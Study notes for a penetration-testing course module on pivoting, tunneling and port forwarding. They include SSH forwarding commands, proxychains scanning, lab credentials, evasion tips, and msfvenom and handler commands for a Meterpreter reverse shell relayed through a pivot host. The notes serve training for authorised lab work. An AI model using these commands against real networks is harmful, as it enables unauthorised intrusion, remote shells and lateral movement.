This module covers pivoting, tunneling, and port forwarding techniques essential for CPTS certification. Based on HTB Academy's comprehensive course, these techniques allow penetration testers to:
- Pivot: Use compromised machines as stepping stones to access other network segments
- Tunnel: Encapsulate traffic through established connections to bypass network restrictions
- Port Forward: Redirect network traffic from one port to another to access services
- Understanding network segmentation and NAT
- Identifying pivot opportunities
- Traffic flow analysis and routing
- Security implications of tunneling
- SSH port forwarding (Local, Remote, Dynamic)
- SOCKS proxy implementation
- Tool integration through proxychains
- Multiple hop scenarios
- Modern tunneling tools (Chisel, Ligolo-ng)
- DMZ to internal network pivoting
- Firewall bypass techniques
- Multi-segment network traversal
- Maintaining persistent access
```
[Internet] → [Edge Router] → [Firewall] → [DMZ] → [Internal Firewall] → [LAN]
                                            ↓                             ↓
                                      Web Servers                   Workstations
                                      Mail Servers                  Domain Controllers
                                      Database Servers
```
- Web servers in DMZ with internal network access
- Jump boxes with multiple network interfaces
- VPN endpoints bridging networks
- Dual-homed hosts spanning network segments
```
pivoting-tunneling-port-forwarding/
├── pivoting-overview.md          # This overview file
├── dynamic-port-forwarding.md    # SSH SOCKS tunneling (HTB Page 3)
├── remote-port-forwarding.md     # SSH Remote/Reverse forwarding (HTB Page 4)
├── ssh-tunneling.md              # Complete SSH forwarding guide
├── proxychains-socks.md          # Proxychains configuration and usage
├── chisel-tunneling.md           # Modern HTTP tunneling
├── ligolo-ng.md                  # Next-gen tunneling agent
├── metasploit-pivoting.md        # MSF autoroute and pivoting
├── windows-pivoting-tools.md     # Windows native tools
├── dns-icmp-tunneling.md         # Alternative tunneling protocols
└── skills-assessment.md          # Practical scenarios and labs
```
- Start Here: Dynamic Port Forwarding - HTB Academy Page 3 foundation
- Reverse Shells: Remote Port Forwarding - HTB Academy Page 4 (Meterpreter)
- SSH Mastery: SSH Tunneling - Complete SSH techniques
- Tool Integration: Proxychains & SOCKS - Tool tunneling
- Modern Tools: Chisel and Ligolo-ng
- Framework Integration: Metasploit Pivoting
- Practice: Skills Assessment - Hands-on scenarios
Based on HTB Academy module demonstrating:
- Local Port Forwarding (-L): Access specific services
- Dynamic Port Forwarding (-D): Create SOCKS proxy
- Network Discovery: Scanning internal networks via pivot
- Tool Integration: Nmap, Metasploit, RDP through proxychains
Advanced HTB Academy scenarios covering:
- Remote Port Forwarding (-R): Expose local services to remote networks
- Reverse Shell Pivoting: Meterpreter payload through pivot host
- Network Isolation: When targets can't directly reach attack host
- Payload Delivery: File transfer and execution through pivot
Lab Scenario:

```
Attack Host (10.10.15.x)  ←  Ubuntu Server (10.129.202.64)  ←  Windows Target (172.16.5.19)
MSF Handler :8000            SSH -R :8080 forward              Meterpreter payload
```

Network Topology:

```
Attack Host (10.10.15.x) → Ubuntu Server (10.129.202.64) → Internal Network (172.16.5.0/23)
                           ens192: 10.129.202.64
                           ens224: 172.16.5.129
```
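Two details decide whether the reverse-shell pivot above actually connects: the payload must call back to the pivot's internal interface (172.16.5.129:8080) while the handler listens on the attack host's port (8000), and the pivot's sshd must let a remote forward bind to a non-loopback address (by default sshd binds `-R` forwards to 127.0.0.1, so the Windows target could never reach it). The script below is an added example, not code from the HTB module: it derives the three commands from the lab values and checks a pasted `sshd -T` output for the `GatewayPorts` setting. The payload type (`reverse_https`) and the output filename are assumptions.

```bash
#!/usr/bin/env bash
# Added example (not from the HTB module): build the reverse pivot commands
# from the lab topology and check the sshd setting that silently breaks it.
set -eu

ATTACK_PORT=8000              # MSF handler port on the attack host
PIVOT_PORT=8080               # port the ssh -R forward opens on the pivot
PIVOT_INT_IP=172.16.5.129     # pivot's internal (ens224) address
PIVOT_SSH=ubuntu@10.129.202.64

# Remote forward: pivot's 172.16.5.129:8080 -> attack host :8000.
# The bind address is only honoured when sshd has GatewayPorts yes|clientspecified;
# otherwise the listener lands on 127.0.0.1 and the target cannot reach it.
remote_forward_cmd() {
  printf 'ssh -R %s:%s:0.0.0.0:%s %s -vN\n' \
    "$PIVOT_INT_IP" "$PIVOT_PORT" "$ATTACK_PORT" "$PIVOT_SSH"
}

# Payload: LHOST is the pivot's internal address (not the attack host) and
# LPORT is the pivot-side port (not the handler's). Filename is assumed.
payload_cmd() {
  printf 'msfvenom -p windows/x64/meterpreter/reverse_https LHOST=%s LPORT=%s -f exe -o backupscript.exe\n' \
    "$PIVOT_INT_IP" "$PIVOT_PORT"
}

# Handler: the local end of the tunnel, so it listens on the attack host port.
handler_cmd() {
  printf "msfconsole -q -x 'use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_https; set LHOST 0.0.0.0; set LPORT %s; run'\n" \
    "$ATTACK_PORT"
}

# gatewayports_ok <text of `sshd -T` run on the pivot>: returns 0 when sshd
# will honour a non-loopback bind address for remote forwards.
gatewayports_ok() {
  printf '%s\n' "$1" | grep -qiE '^gatewayports (yes|clientspecified)$'
}

# Usage: print the three commands in the order they are run.
echo "# 1. on the attack host:"; handler_cmd
echo "# 2. on the attack host:"; remote_forward_cmd
echo "# 3. build and deliver to 172.16.5.19:"; payload_cmd
```

Run `sudo sshd -T | grep -i gatewayports` on the pivot and feed the line to `gatewayports_ok`; if it reports `no`, either enable it in sshd_config or bind the forward to the default address and verify with `ss -tlnp` on the pivot where it actually listens.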
```
[Attack Host] → [SOCKS Client] → [SSH Tunnel] → [Pivot Host]       → [Target Network]
      ↓               ↓               ↓               ↓                      ↓
 Tool Request  →  Proxychains  →  SSH Port 22  → Internal Interface  → Target Service
```
| Technique | Command | Use Case |
|---|---|---|
| Local Forward | `ssh -L 1234:target:3306 user@pivot` | Access specific service |
| Dynamic Forward | `ssh -D 9050 user@pivot` | SOCKS proxy for multiple tools |
| Remote Forward | `ssh -R 8080:localhost:80 user@pivot` | Expose local service |
| Background Tunnel | `ssh -fNT -D 9050 user@pivot` | Persistent background proxy |
```bash
# Configure proxychains (the file is /etc/proxychains4.conf on newer installs)
echo "socks4 127.0.0.1 9050" >> /etc/proxychains.conf

# Use tools through proxy
proxychains nmap -Pn -sT 172.16.5.19
proxychains msfconsole
proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123
```

```bash
# Check pivot interfaces
ifconfig          # Linux
ipconfig /all     # Windows

# Scan internal networks. proxychains only relays full TCP connections, so
# ICMP/ARP host discovery (-sn) is unreliable through the proxy; -Pn -sT is
# the dependable combination.
proxychains nmap -sn 172.16.5.1-200
proxychains nmap -Pn -sT -p 22,80,135,139,443,445,3389 172.16.5.19
```

| Range | Type | Description |
|---|---|---|
| 10.0.0.0/8 | Private | Class A private networks |
| 172.16.0.0/12 | Private | Class B private networks |
| 192.168.0.0/16 | Private | Class C private networks |
| 169.254.0.0/16 | Link-Local | APIPA addresses |
| 127.0.0.0/8 | Loopback | Localhost |
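Spotting a pivot candidate is mostly a matter of classifying every interface address against the ranges in the table and noticing when one host sits in two of them. The script below is an added example, not part of the HTB module: it implements the table as CIDR checks in plain shell arithmetic and flags a host as multi-homed when its non-loopback interfaces fall into more than one range. The interface listing is a constructed sample in `ip -o -4 addr show` format modelled on the lab pivot (ens192/ens224), not real output.

```bash
#!/usr/bin/env bash
# Added example (not from the HTB module): classify IPv4 addresses against
# the RFC 1918 / link-local / loopback ranges and detect multi-homed hosts.
set -eu

# ip_to_int 172.16.5.129 -> 2886731137 (octets with leading zeros are not handled)
ip_to_int() {
  set -- $(printf '%s' "$1" | tr . ' ')
  echo $(( ($1 << 24) | ($2 << 16) | ($3 << 8) | $4 ))
}

# in_cidr <ip> <network> <prefixlen>: returns 0 when ip lies in network/prefixlen
in_cidr() {
  addr=$(ip_to_int "$1"); net=$(ip_to_int "$2")
  mask=$(( (4294967295 << (32 - $3)) & 4294967295 ))
  [ $(( addr & mask )) -eq $(( net & mask )) ]
}

# classify <ip>: prints the range label from the table above, or "public"
classify() {
  if   in_cidr "$1" 127.0.0.0 8;    then echo loopback
  elif in_cidr "$1" 169.254.0.0 16; then echo link-local
  elif in_cidr "$1" 10.0.0.0 8;     then echo rfc1918-10/8
  elif in_cidr "$1" 172.16.0.0 12;  then echo rfc1918-172.16/12
  elif in_cidr "$1" 192.168.0.0 16; then echo rfc1918-192.168/16
  else echo public; fi
}

# Constructed sample of `ip -o -4 addr show` on the lab pivot (not real output)
SAMPLE_IP_ADDR='1: lo    inet 127.0.0.1/8 scope host lo
2: ens192    inet 10.129.202.64/16 brd 10.129.255.255 scope global ens192
3: ens224    inet 172.16.5.129/23 brd 172.16.5.255 scope global ens224'

# pivot_ranges <ip -o -4 addr output>: one line per non-loopback interface,
# "<dev> <ip> <range>", e.g. "ens224 172.16.5.129 rfc1918-172.16/12"
pivot_ranges() {
  printf '%s\n' "$1" | while read -r idx dev fam cidr rest; do
    [ "$fam" = inet ] || continue
    addr_str=${cidr%/*}
    label=$(classify "$addr_str")
    if [ "$label" != loopback ]; then
      echo "$dev $addr_str $label"
    fi
  done
}

# is_multihomed <ip -o -4 addr output>: returns 0 when the host spans more
# than one distinct range, i.e. it is a candidate pivot between segments
is_multihomed() {
  n=$(pivot_ranges "$1" | awk '{print $3}' | sort -u | awk 'END{print NR}')
  [ "$n" -gt 1 ]
}

# Usage on a real host: is_multihomed "$(ip -o -4 addr show)" && echo pivot
pivot_ranges "$SAMPLE_IP_ADDR"
is_multihomed "$SAMPLE_IP_ADDR" && echo "multi-homed: pivot candidate"
```

Two interfaces in the same range (say two 10.0.0.0/8 addresses) are not flagged, since they usually belong to one segment; a 10.x address next to a 172.16.x one, as on the lab pivot, is exactly the dual-homed shape the list of pivot opportunities describes.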
```bash
# Linux
ip route show
ip addr show
arp -a

# Windows
route print
ipconfig /all
arp -a
```

```bash
# Test common private ranges
ping -c 1 192.168.1.1
ping -c 1 10.10.10.1
ping -c 1 172.16.1.1

# Port connectivity
nc -zv 192.168.1.100 22
telnet 172.16.5.19 3389
```

```bash
# Through SOCKS proxy (TCP connect scans only; -Pn because ICMP is not proxied)
proxychains nmap -Pn -sT --top-ports 1000 172.16.5.0/24
# masscan builds its own packets over raw sockets, so proxychains (which hooks
# libc connect()) cannot relay it; run it on the pivot itself instead
# proxychains masscan -p1-65535 --rate=1000 172.16.5.0/24
```

| Tool | SSH Tunnel | SOCKS Proxy | HTTP Tunnel | Notes |
|---|---|---|---|---|
| Nmap | ✅ (Local Forward) | ✅ (TCP Connect only) | ✅ | Use -sT scan type |
| Metasploit | ✅ | ✅ | ✅ | Full framework support |
| Web Browsers | ✅ | ✅ | ✅ | Configure proxy settings |
| cURL/wget | ✅ | ✅ | ✅ | Use --proxy flag |
| Database Tools | ✅ | ✅ | ✅ | Connect to forwarded ports |
| RDP/VNC | ✅ | ✅ | ✅ | Remote desktop access |
- Encrypt tunnels when possible (SSH, HTTPS)
- Mimic legitimate traffic patterns
- Use standard ports when feasible (80, 443, 53)
- Clean up connections after assessment
- Monitor tunnel stability and performance
- DPI (Deep Packet Inspection) may detect tunneling
- Traffic analysis can reveal unusual patterns
- Connection monitoring may alert on new services
- Log correlation might expose pivot activities
| Problem | Cause | Solution |
|---|---|---|
| Connection timeout | Firewall blocking | Try different ports/protocols |
| DNS resolution fails | DNS not proxied | Enable proxy_dns in proxychains |
| Slow performance | Network latency | Use compression (-C flag) |
| Tool incompatibility | Tool uses raw sockets (SYN scans, masscan) that proxychains cannot relay | Use TCP connect scans (-sT) only |
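The proxychains problems in the table come down to two settings in the config file: `proxy_dns` off, so name lookups leave the attack host directly (the DNS failure above, plus target hostnames leaking to the local resolver), and a `socks4` entry where `ssh -D`, which speaks both SOCKS4 and SOCKS5, could be used as SOCKS5. The script below is an added example, not part of the HTB module: it writes a config for the SSH SOCKS tunnel and lints it for those two settings. The file path is a parameter; the usage at the bottom writes to a temporary file rather than `/etc/proxychains.conf`.

```bash
#!/usr/bin/env bash
# Added example (not from the HTB module): write and lint a proxychains
# config for an `ssh -D 9050` tunnel.
set -eu

# write_pc_conf <file> <socks4|socks5> <port> <proxy_dns yes|no>
write_pc_conf() {
  conf=$1; ver=$2; port=$3; dns=$4
  {
    echo 'strict_chain'               # single hop: fail loudly if the listener is down
    if [ "$dns" = yes ]; then
      echo 'proxy_dns'                # resolve names through the tunnel, not locally
    fi
    echo 'tcp_read_time_out 15000'
    echo 'tcp_connect_time_out 8000'
    echo '[ProxyList]'
    echo "$ver 127.0.0.1 $port"       # the ssh -D listener on the attack host
  } > "$conf"
}

# lint_pc_conf <file>: prints one finding per line, returns 1 if any were found
lint_pc_conf() {
  rc=0
  if ! grep -qE '^proxy_dns' "$1"; then
    echo "proxy_dns missing: DNS lookups bypass the tunnel and leak target names"
    rc=1
  fi
  if grep -qE '^[[:space:]]*socks4[[:space:]]' "$1"; then
    echo "socks4 in [ProxyList]: use socks5, ssh -D serves both"
    rc=1
  fi
  if ! grep -qE '^[[:space:]]*socks[45][[:space:]]+127\.0\.0\.1[[:space:]]+[0-9]+' "$1"; then
    echo "no local SOCKS entry in [ProxyList]: tools will not reach the tunnel"
    rc=1
  fi
  return $rc
}

# Usage: a weak config (socks4, no proxy_dns) followed by the corrected one
tmpconf=$(mktemp)
write_pc_conf "$tmpconf" socks4 9050 no
lint_pc_conf "$tmpconf" || true
write_pc_conf "$tmpconf" socks5 9050 yes
lint_pc_conf "$tmpconf" && echo "config OK: $tmpconf"
rm -f "$tmpconf"
```

Even with the corrected config, `ssh -D` forwards TCP only: anything the tool sends over UDP (DNS it resolves itself, SNMP, NetBIOS name queries) never enters the tunnel, which is the first thing to check when a tool "works" but sees nothing.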
```bash
# Check tunnel status
netstat -antp | grep :9050
ss -tlnp | grep :9050

# Test connectivity
nc -v 127.0.0.1 9050
telnet 127.0.0.1 9050

# Verbose output
proxychains -v nmap target
ssh -v -D 9050 user@pivot
```

Credentials:
- Ubuntu Server: `ubuntu:HTB_@cademy_stdnt!`
- Windows Target: `victor:pass@123`

Network Topology:

```
Attack Host → Ubuntu Server (10.129.202.64) → Windows DC (172.16.5.19)
              ens192: 10.129.202.64
              ens224: 172.16.5.129
```
Objectives:
- Enumerate network interfaces on pivot
- Set up SOCKS proxy via SSH
- Scan internal network through proxy
- Access Windows host via RDP
- Retrieve flag from Desktop
- Map network topology
- Identify trust relationships
- Locate multi-homed hosts
- Test basic connectivity
- Use encrypted tunnels
- Monitor connection stability
- Document tunnel configurations
- Test tool compatibility
- Clean up all connections
- Remove configuration files
- Document findings
- Verify cleanup completion
- Quick tunnel setup under time pressure
- Tool integration through proxies
- Multi-hop scenarios planning
- Troubleshooting common issues
- Documentation of pivot paths
- Set up tunnels in under 2 minutes
- Chain multiple pivots successfully
- Use various tools through proxies
- Handle connection failures gracefully
- Maintain operational security
- Start with Dynamic Port Forwarding: Review HTB Academy Page 3 concepts
- Practice SSH Tunneling: Master all forwarding types
- Learn Proxychains: Configure and use with various tools
- Explore Modern Tools: Chisel and Ligolo-ng alternatives
- Complete Skills Assessment: Hands-on lab scenarios
- HTB Academy: Pivoting, Tunneling & Port Forwarding Module
- SSH Documentation: `man ssh`, `man ssh_config`
- Proxychains: `/etc/proxychains.conf` configuration
- SOCKS Protocol: RFC 1928 (SOCKS5), RFC 1929 (Authentication)
- Network Fundamentals: RFC 1918 (Private Address Space)